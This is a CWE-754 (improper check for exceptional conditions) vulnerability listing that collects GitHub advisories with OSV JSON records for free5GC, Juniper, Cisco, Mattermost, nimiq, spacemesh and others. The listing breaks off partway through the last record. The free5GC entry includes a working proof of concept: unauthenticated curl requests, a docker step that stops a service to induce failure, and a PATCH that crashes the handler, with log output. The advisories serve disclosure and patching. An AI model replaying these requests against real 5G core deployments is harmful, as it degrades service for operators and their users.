Common Weakness Enumeration

CWE-754

Allowed-with-Review

Improper Check for Unusual or Exceptional Conditions

Abstraction: Class · Status: Incomplete

The product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product.

907 vulnerabilities reference this CWE, most recent first.

GHSA-J59F-X285-69JX

Vulnerability from github – Published: 2026-05-08 22:50 – Updated: 2026-06-08 23:47
VLAI
Summary
free5GC's NEF 3gpp-pfd-management PATCH applications/{appId} panics on UDR access failure due to nil ProblemDetails dereference
Details

Summary

free5GC's NEF PATCH /3gpp-pfd-management/v1/{afId}/transactions/{transId}/applications/{appId} handler panics with a nil-pointer dereference when the upstream UDR call fails AND the consumer wrapper returns err != nil together with a nil *ProblemDetails. The handler's errPfdData != nil branch builds its own problemDetailsErr correctly, but immediately after it reads problemDetails.Cause (the OTHER value, which is nil in this branch) and panics. Gin recovery converts the panic into HTTP 500, so a single PATCH against this endpoint returns 500 instead of the intended controlled error response whenever UDR access is failing.

This is a second-order bug: the trigger requires UDR access to be failing (e.g. NRF or UDR is unreachable, registration broken, transient network failure). The attacker does not directly control that condition, so this is scored as AC:H. Once the upstream condition exists, the trigger is a single PATCH request and is repeatable.

The HTTP request itself in v4.2.1 is reachable without an Authorization header because the underlying NEF 3gpp-pfd-management route group is mounted without inbound auth middleware (see free5gc/free5gc#858). So in the validation lab the entire trigger chain is unauthenticated end-to-end.

Details

Validated against the NEF container in the official Docker compose lab. - Source repo tag: v4.2.1 - Running Docker image: free5gc/nef:v4.2.1 - Runtime NEF commit: 5ce35eab - Docker validation date: 2026-03-21 (container log timestamp 2026-03-21T03:06:36Z) - NEF endpoint: http://10.100.200.19:8000

Vulnerable handler logic in PatchIndividualApplicationPFDManagement (paraphrased):

pdfData, problemDetails, errPfdData := p.Consumer().AppDataPfdsAppIdGet(appID)

switch {
case problemDetails != nil:
    ...
case errPfdData != nil:
    problemDetailsErr := &models.ProblemDetails{
        Status: http.StatusInternalServerError,
        Detail: "Query to UDR failed",
    }
    c.Set(sbi.IN_PB_DETAILS_CTX_STR, problemDetails.Cause)   // <-- nil deref
    c.JSON(int(problemDetailsErr.Status), problemDetailsErr)
    return
}

In the errPfdData != nil branch, problemDetails is by construction nil (otherwise the first case would have matched). Reading problemDetails.Cause panics with runtime error: invalid memory address or nil pointer dereference. The intended value is presumably problemDetailsErr.Cause -- the locally constructed problem-details struct.

Code evidence (paths in free5gc/nef): - Patch handler core path: - NFs/nef/internal/sbi/processor/pfd.go:563 - NFs/nef/internal/sbi/processor/pfd.go:610 - Panic site (nil-deref on problemDetails.Cause): - NFs/nef/internal/sbi/processor/pfd.go:622 - Route exposure / dispatch: - NFs/nef/internal/sbi/api_pfd.go:168 - NFs/nef/internal/sbi/api_pfd.go:188

PoC

Reproduced end-to-end against the running NEF at http://10.100.200.19:8000. The trigger requires UDR access to be failing -- the lab simulates this by stopping NRF (so NEF's UDR client fails to discover/dial UDR). In production, equivalent triggers include NRF outages, UDR outages, or transient network failures.

  1. Create an AF context (no Authorization header):
curl -i -X POST 'http://10.100.200.19:8000/3gpp-traffic-influence/v1/afnpd3/subscriptions' \
  -H 'Content-Type: application/json' \
  --data '{"afAppId":"app-nef-npd3","anyUeInd":true}'
  1. Create a PFD-management transaction:
curl -i -X POST 'http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions' \
  -H 'Content-Type: application/json' \
  --data '{"pfdDatas":{"appnpd3":{"externalAppId":"appnpd3","pfds":{"pfd1":{"pfdId":"pfd1","flowDescriptions":["permit in ip from 10.68.28.39 80 to any"]}}}}}'
  1. Make UDR access fail (lab simulation):
docker stop nrf
  1. Trigger the panic with one PATCH:
curl -i -X PATCH 'http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3' \
  -H 'Content-Type: application/json' \
  --data '{"externalAppId":"appnpd3","pfds":{"pfd1":{"pfdId":"pfd1","flowDescriptions":[]}}}'
HTTP/1.1 500 Internal Server Error
Content-Length: 0
  1. NEF container logs (docker logs --since 2026-03-21T03:06:36Z nef) confirm the nil-deref panic at pfd.go:622 inside PatchIndividualApplicationPFDManagement:
[INFO][NEF][PFDMng] PatchIndividualApplicationPFDManagement - scsAsID[afnpd3], transID[1], appID[appnpd3]
[ERRO][NEF][GIN] panic: runtime error: invalid memory address or nil pointer dereference
github.com/free5gc/nef/internal/sbi/processor.(*Processor).PatchIndividualApplicationPFDManagement
    .../pfd.go:622
github.com/free5gc/nef/internal/sbi.(*Server).apiPatchIndividualApplicationPFDManagement
    .../api_pfd.go:188
[INFO][NEF][GIN] | 500 | PATCH | /3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3 |
  1. Restore for further testing:
docker start nrf

Impact

NULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754): the errPfdData != nil branch reads problemDetails.Cause even though problemDetails is nil by construction in that branch (the prior case already matched the non-nil case). The intended target was the locally constructed problemDetailsErr.Cause.

Gin recovery catches the panic, so the NEF process is NOT killed and other endpoints continue serving. The realized impact is per-request: PATCH against this endpoint returns 500 (with empty body and a stack trace in NEF logs) instead of the intended controlled UDR-failure response, whenever upstream UDR access is failing.

No Confidentiality impact (the response is 500 with empty body). No persistent Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation and only fires while UDR access is independently broken; the attacker does not directly control that precondition, so AC:H is the honest assessment.

Affected: free5gc v4.2.1.

Upstream issue: https://github.com/free5gc/free5gc/issues/925 Upstream fix: https://github.com/free5gc/nef/pull/22

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/free5gc/nef"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44322"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476",
      "CWE-754"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T22:50:57Z",
    "nvd_published_at": "2026-05-27T17:16:37Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nfree5GC\u0027s NEF `PATCH /3gpp-pfd-management/v1/{afId}/transactions/{transId}/applications/{appId}` handler panics with a nil-pointer dereference when the upstream UDR call fails AND the consumer wrapper returns `err != nil` together with a nil `*ProblemDetails`. The handler\u0027s `errPfdData != nil` branch builds its own `problemDetailsErr` correctly, but immediately after it reads `problemDetails.Cause` (the OTHER value, which is nil in this branch) and panics. Gin recovery converts the panic into `HTTP 500`, so a single PATCH against this endpoint returns 500 instead of the intended controlled error response whenever UDR access is failing.\n\nThis is a second-order bug: the trigger requires UDR access to be failing (e.g. NRF or UDR is unreachable, registration broken, transient network failure). The attacker does not directly control that condition, so this is scored as AC:H. Once the upstream condition exists, the trigger is a single PATCH request and is repeatable.\n\nThe HTTP request itself in v4.2.1 is reachable without an `Authorization` header because the underlying NEF `3gpp-pfd-management` route group is mounted without inbound auth middleware (see free5gc/free5gc#858). So in the validation lab the entire trigger chain is unauthenticated end-to-end.\n\n### Details\nValidated against the NEF container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/nef:v4.2.1`\n- Runtime NEF commit: `5ce35eab`\n- Docker validation date: 2026-03-21 (container log timestamp `2026-03-21T03:06:36Z`)\n- NEF endpoint: `http://10.100.200.19:8000`\n\nVulnerable handler logic in `PatchIndividualApplicationPFDManagement` (paraphrased):\n```go\npdfData, problemDetails, errPfdData := p.Consumer().AppDataPfdsAppIdGet(appID)\n\nswitch {\ncase problemDetails != nil:\n    ...\ncase errPfdData != nil:\n    problemDetailsErr := \u0026models.ProblemDetails{\n        Status: http.StatusInternalServerError,\n        Detail: \"Query to UDR failed\",\n    }\n    c.Set(sbi.IN_PB_DETAILS_CTX_STR, problemDetails.Cause)   // \u003c-- nil deref\n    c.JSON(int(problemDetailsErr.Status), problemDetailsErr)\n    return\n}\n```\nIn the `errPfdData != nil` branch, `problemDetails` is by construction nil (otherwise the first `case` would have matched). Reading `problemDetails.Cause` panics with `runtime error: invalid memory address or nil pointer dereference`. The intended value is presumably `problemDetailsErr.Cause` -- the locally constructed problem-details struct.\n\nCode evidence (paths in `free5gc/nef`):\n- Patch handler core path:\n  - `NFs/nef/internal/sbi/processor/pfd.go:563`\n  - `NFs/nef/internal/sbi/processor/pfd.go:610`\n- Panic site (nil-deref on `problemDetails.Cause`):\n  - `NFs/nef/internal/sbi/processor/pfd.go:622`\n- Route exposure / dispatch:\n  - `NFs/nef/internal/sbi/api_pfd.go:168`\n  - `NFs/nef/internal/sbi/api_pfd.go:188`\n\n### PoC\nReproduced end-to-end against the running NEF at `http://10.100.200.19:8000`. The trigger requires UDR access to be failing -- the lab simulates this by stopping NRF (so NEF\u0027s UDR client fails to discover/dial UDR). In production, equivalent triggers include NRF outages, UDR outages, or transient network failures.\n\n1. Create an AF context (no Authorization header):\n```\ncurl -i -X POST \u0027http://10.100.200.19:8000/3gpp-traffic-influence/v1/afnpd3/subscriptions\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{\"afAppId\":\"app-nef-npd3\",\"anyUeInd\":true}\u0027\n```\n\n2. Create a PFD-management transaction:\n```\ncurl -i -X POST \u0027http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{\"pfdDatas\":{\"appnpd3\":{\"externalAppId\":\"appnpd3\",\"pfds\":{\"pfd1\":{\"pfdId\":\"pfd1\",\"flowDescriptions\":[\"permit in ip from 10.68.28.39 80 to any\"]}}}}}\u0027\n```\n\n3. Make UDR access fail (lab simulation):\n```\ndocker stop nrf\n```\n\n4. Trigger the panic with one PATCH:\n```\ncurl -i -X PATCH \u0027http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{\"externalAppId\":\"appnpd3\",\"pfds\":{\"pfd1\":{\"pfdId\":\"pfd1\",\"flowDescriptions\":[]}}}\u0027\n```\n```\nHTTP/1.1 500 Internal Server Error\nContent-Length: 0\n```\n\n5. NEF container logs (`docker logs --since 2026-03-21T03:06:36Z nef`) confirm the nil-deref panic at `pfd.go:622` inside `PatchIndividualApplicationPFDManagement`:\n```\n[INFO][NEF][PFDMng] PatchIndividualApplicationPFDManagement - scsAsID[afnpd3], transID[1], appID[appnpd3]\n[ERRO][NEF][GIN] panic: runtime error: invalid memory address or nil pointer dereference\ngithub.com/free5gc/nef/internal/sbi/processor.(*Processor).PatchIndividualApplicationPFDManagement\n    .../pfd.go:622\ngithub.com/free5gc/nef/internal/sbi.(*Server).apiPatchIndividualApplicationPFDManagement\n    .../api_pfd.go:188\n[INFO][NEF][GIN] | 500 | PATCH | /3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3 |\n```\n\n6. Restore for further testing:\n```\ndocker start nrf\n```\n\n### Impact\nNULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754): the `errPfdData != nil` branch reads `problemDetails.Cause` even though `problemDetails` is nil by construction in that branch (the prior `case` already matched the non-nil case). The intended target was the locally constructed `problemDetailsErr.Cause`.\n\nGin recovery catches the panic, so the NEF process is NOT killed and other endpoints continue serving. The realized impact is per-request: PATCH against this endpoint returns `500` (with empty body and a stack trace in NEF logs) instead of the intended controlled UDR-failure response, whenever upstream UDR access is failing.\n\nNo Confidentiality impact (the response is `500` with empty body). No persistent Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation and only fires while UDR access is independently broken; the attacker does not directly control that precondition, so AC:H is the honest assessment.\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/925\nUpstream fix: https://github.com/free5gc/nef/pull/22",
  "id": "GHSA-j59f-x285-69jx",
  "modified": "2026-06-08T23:47:23Z",
  "published": "2026-05-08T22:50:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-j59f-x285-69jx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44322"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/issues/925"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/nef/pull/22"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/nef/commit/72a47f3fab4dffbd227f8d92c5f69dca93b610cb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/free5gc/free5gc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "free5GC\u0027s NEF 3gpp-pfd-management PATCH applications/{appId} panics on UDR access failure due to nil ProblemDetails dereference"
}

GHSA-J5JC-PGC3-GHJF

Vulnerability from github – Published: 2022-05-17 00:15 – Updated: 2022-05-17 00:15
VLAI
Details

StreamRelay.NET.exe ver2.14.0.7 and earlier allows remote attackers to cause a denial of service via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-10894"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-12-01T14:29:00Z",
    "severity": "HIGH"
  },
  "details": "StreamRelay.NET.exe ver2.14.0.7 and earlier allows remote attackers to cause a denial of service via unspecified vectors.",
  "id": "GHSA-j5jc-pgc3-ghjf",
  "modified": "2022-05-17T00:15:12Z",
  "published": "2022-05-17T00:15:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-10894"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN71291160/index.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J5WQ-FJ8P-RH45

Vulnerability from github – Published: 2023-04-19 09:30 – Updated: 2025-02-05 18:34
VLAI
Details

A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that could cause denial of service of the controller when communicating over the Modbus TCP protocol.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-25619"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-19T08:15:07Z",
    "severity": "HIGH"
  },
  "details": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that\ncould cause denial of service of the controller when communicating over the Modbus TCP\nprotocol.",
  "id": "GHSA-j5wq-fj8p-rh45",
  "modified": "2025-02-05T18:34:34Z",
  "published": "2023-04-19T09:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25619"
    },
    {
      "type": "WEB",
      "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2023-101-05\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2023-101-05.pdf"
    },
    {
      "type": "WEB",
      "url": "https://https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2023-101-05\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2023-101-05.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J62J-MJVG-XGRQ

Vulnerability from github – Published: 2023-10-13 00:30 – Updated: 2024-04-04 08:37
VLAI
Details

An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS).

On Junos MX Series platforms with Precision Time Protocol (PTP) configured, a prolonged routing protocol churn can lead to an FPC crash and restart.

This issue affects Juniper Networks Junos OS on MX Series:

  • All versions prior to 20.4R3-S4;
  • 21.1 version 21.1R1 and later versions;
  • 21.2 versions prior to 21.2R3-S2;
  • 21.3 versions prior to 21.3R3-S5;
  • 21.4 versions prior to 21.4R3;
  • 22.1 versions prior to 22.1R3;
  • 22.2 versions prior to 22.2R1-S1, 22.2R2.
Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-44199"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-13T00:15:12Z",
    "severity": "HIGH"
  },
  "details": "\nAn Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS).\n\nOn Junos MX Series platforms with Precision Time Protocol (PTP) configured, a prolonged routing protocol churn can lead to an FPC crash and restart.\n\nThis issue affects Juniper Networks Junos OS on MX Series:\n\n\n\n  *  All versions prior to 20.4R3-S4;\n  *  21.1 version 21.1R1 and later versions;\n  *  21.2 versions prior to 21.2R3-S2;\n  *  21.3 versions prior to 21.3R3-S5;\n  *  21.4 versions prior to 21.4R3;\n  *  22.1 versions prior to 22.1R3;\n  *  22.2 versions prior to 22.2R1-S1, 22.2R2.\n\n\n\n\n\n\n",
  "id": "GHSA-j62j-mjvg-xgrq",
  "modified": "2024-04-04T08:37:13Z",
  "published": "2023-10-13T00:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44199"
    },
    {
      "type": "WEB",
      "url": "https://supportportal.juniper.net/JSA73165"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J76W-P754-G2W7

Vulnerability from github – Published: 2026-05-15 21:31 – Updated: 2026-05-28 19:28
VLAI
Summary
Mattermost doesn't validate the response body of proxied images
Details

Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate the response body of proxied images, which allows a remote attacker to enact client-side DoS via an SVG file served from an attacker-controlled origin under a non-SVG Content-Type header (e.g. image/png) embedded in an og:image meta tag or Markdown image link. Mattermost Advisory ID: MMSA-2026-00630.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.5.0"
            },
            {
              "fixed": "11.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0-20250731163400-5b955468ea1e"
            },
            {
              "fixed": "0.0.0-20260414103857-b21ef302025e"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.4.0"
            },
            {
              "fixed": "11.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-4054"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-28T19:28:48Z",
    "nvd_published_at": "2026-05-15T19:17:04Z",
    "severity": "MODERATE"
  },
  "details": "Mattermost versions 11.5.x \u003c= 11.5.1, 10.11.x \u003c= 10.11.13, 11.4.x \u003c= 11.4.3 fail to validate the response body of proxied images, which allows a remote attacker to enact client-side DoS via an SVG file served from an attacker-controlled origin under a non-SVG Content-Type header (e.g. image/png) embedded in an og:image meta tag or Markdown image link. Mattermost Advisory ID: MMSA-2026-00630.",
  "id": "GHSA-j76w-p754-g2w7",
  "modified": "2026-05-28T19:28:48Z",
  "published": "2026-05-15T21:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4054"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mattermost/mattermost"
    },
    {
      "type": "WEB",
      "url": "https://mattermost.com/security-updates"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mattermost doesn\u0027t validate the response body of proxied images"
}

GHSA-J8WQ-QRFV-42Q5

Vulnerability from github – Published: 2022-05-24 17:29 – Updated: 2023-05-22 21:30
VLAI
Details

Multiple vulnerabilities in the Zone-Based Firewall feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the device to reload or stop forwarding traffic through the firewall. The vulnerabilities are due to incomplete handling of Layer 4 packets through the device. An attacker could exploit these vulnerabilities by sending a certain sequence of traffic patterns through the device. A successful exploit could allow the attacker to cause the device to reload or stop forwarding traffic through the firewall, resulting in a denial of service. For more information about these vulnerabilities, see the Details section of this advisory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-3480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-09-24T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "Multiple vulnerabilities in the Zone-Based Firewall feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the device to reload or stop forwarding traffic through the firewall. The vulnerabilities are due to incomplete handling of Layer 4 packets through the device. An attacker could exploit these vulnerabilities by sending a certain sequence of traffic patterns through the device. A successful exploit could allow the attacker to cause the device to reload or stop forwarding traffic through the firewall, resulting in a denial of service. For more information about these vulnerabilities, see the Details section of this advisory.",
  "id": "GHSA-j8wq-qrfv-42q5",
  "modified": "2023-05-22T21:30:18Z",
  "published": "2022-05-24T17:29:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-3480"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-zbfw-94ckG4G"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-J93H-6WMF-9MH5

Vulnerability from github – Published: 2024-07-11 18:31 – Updated: 2024-07-11 18:31
VLAI
Details

An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS Evolved on ACX 7000 Series allows an unauthenticated, adjacent attacker to cause a Denial-of-Service (DoS).

When a device has a Layer 3 or an IRB interface configured in a VPLS instance and specific traffic is received, the evo-pfemand processes crashes which causes a service outage for the respective FPC until the system is recovered manually.

This issue only affects Junos OS Evolved 22.4R2-S1 and 22.4R2-S2 releases and is fixed in 22.4R3. No other releases are affected.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-39535"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-11T17:15:10Z",
    "severity": "HIGH"
  },
  "details": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS Evolved on ACX 7000 Series allows an unauthenticated, adjacent attacker to cause a Denial-of-Service (DoS).\n\nWhen a device has a Layer 3 or an IRB interface configured in a VPLS instance and specific traffic is received, the evo-pfemand processes crashes which causes a service outage for the respective FPC until the system is recovered manually.\n\nThis issue only affects Junos OS Evolved 22.4R2-S1 and 22.4R2-S2 releases and is fixed in 22.4R3. No other releases are affected.",
  "id": "GHSA-j93h-6wmf-9mh5",
  "modified": "2024-07-11T18:31:13Z",
  "published": "2024-07-11T18:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39535"
    },
    {
      "type": "WEB",
      "url": "https://supportportal.juniper.net/JSA82995"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-J99G-7RQW-Q9JG

Vulnerability from github – Published: 2026-04-22 19:23 – Updated: 2026-04-27 16:22
VLAI
Summary
nimiq-blockchain: Peer-triggerable panic during history sync
Details

Impact

HistoryStore::put_historic_txns uses an assert! to enforce invariants about HistoricTransaction.block_number (must be within the macro block being pushed and within the same epoch). During history sync, a peer can influence the history: &[HistoricTransaction] input passed into Blockchain::push_history_sync, and a malformed history list can violate these invariants and trigger a panic.

extend_history_sync calls this.history_store.add_to_history(..) before comparing the computed history root against the macro block header (block.history_root()), so the panic can happen before later rejection checks run.

Patches

The patch for this vulnerability is included as part of v1.3.0.

Workarounds

No known workarounds.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "nimiq-blockchain"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34066"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-617",
      "CWE-754"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T19:23:55Z",
    "nvd_published_at": "2026-04-22T20:16:41Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n`HistoryStore::put_historic_txns` uses an `assert!` to enforce invariants about `HistoricTransaction.block_number` (must be within the macro block being pushed and within the same epoch). During history sync, a peer can influence the `history: \u0026[HistoricTransaction]` input passed into `Blockchain::push_history_sync`, and a malformed history list can violate these invariants and trigger a panic.\n\n`extend_history_sync` calls `this.history_store.add_to_history(..)` before comparing the computed history root against the macro block header (`block.history_root()`), so the panic can happen before later rejection checks run.\n\n### Patches\n[The patch for this vulnerability](https://github.com/nimiq/core-rs-albatross/commit/6f5511309c199d84b012fe6b9aba7e5582892c50) is included as part of [v1.3.0](https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0).\n\n### Workarounds\nNo known workarounds.",
  "id": "GHSA-j99g-7rqw-q9jg",
  "modified": "2026-04-27T16:22:38Z",
  "published": "2026-04-22T19:23:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-j99g-7rqw-q9jg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34066"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nimiq/core-rs-albatross/pull/3656"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nimiq/core-rs-albatross/commit/6f5511309c199d84b012fe6b9aba7e5582892c50"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nimiq/core-rs-albatross"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "nimiq-blockchain: Peer-triggerable panic during history sync"
}

GHSA-JCQQ-G64V-GCM7

Vulnerability from github – Published: 2024-05-10 15:33 – Updated: 2024-05-14 19:54
VLAI
Summary
Previous ATX is not checked to be the newest valid ATX by Smesher when validating incoming ATX
Details

Impact

Nodes can publish ATXs which reference the incorrect previous ATX of the Smesher that created the ATX. ATXs are expected to form a single chain from the newest to the first ATX ever published by an identity. Allowing Smeshers to reference an earlier (but not the latest) ATX as previous breaks this protocol rule and can serve as an attack vector where Nodes are rewarded for holding their PoST data for less than one epoch but still being eligible for rewards.

Patches

  • API needs to be extended to be able to fetch events from a node that dected malicious behavior of this regard by the node
  • go-spacemesh needs to be patched to a) not allow publishing these ATXs any more and b) create malfeasance proofs for identities that published invalid ATXs in the past.

Workarounds

n/a

References

Spacemesh protocol whitepaper: https://spacemesh.io/blog/spacemesh-white-paper-1/, specifically sections 4.4.2 ("ATX Contents") and 4.4.3 ("ATX validity")

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/spacemeshos/go-spacemesh"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.5.2-hotfix1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/spacemeshos/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.37.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34360"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-754"
    ],
    "github_reviewed": true,
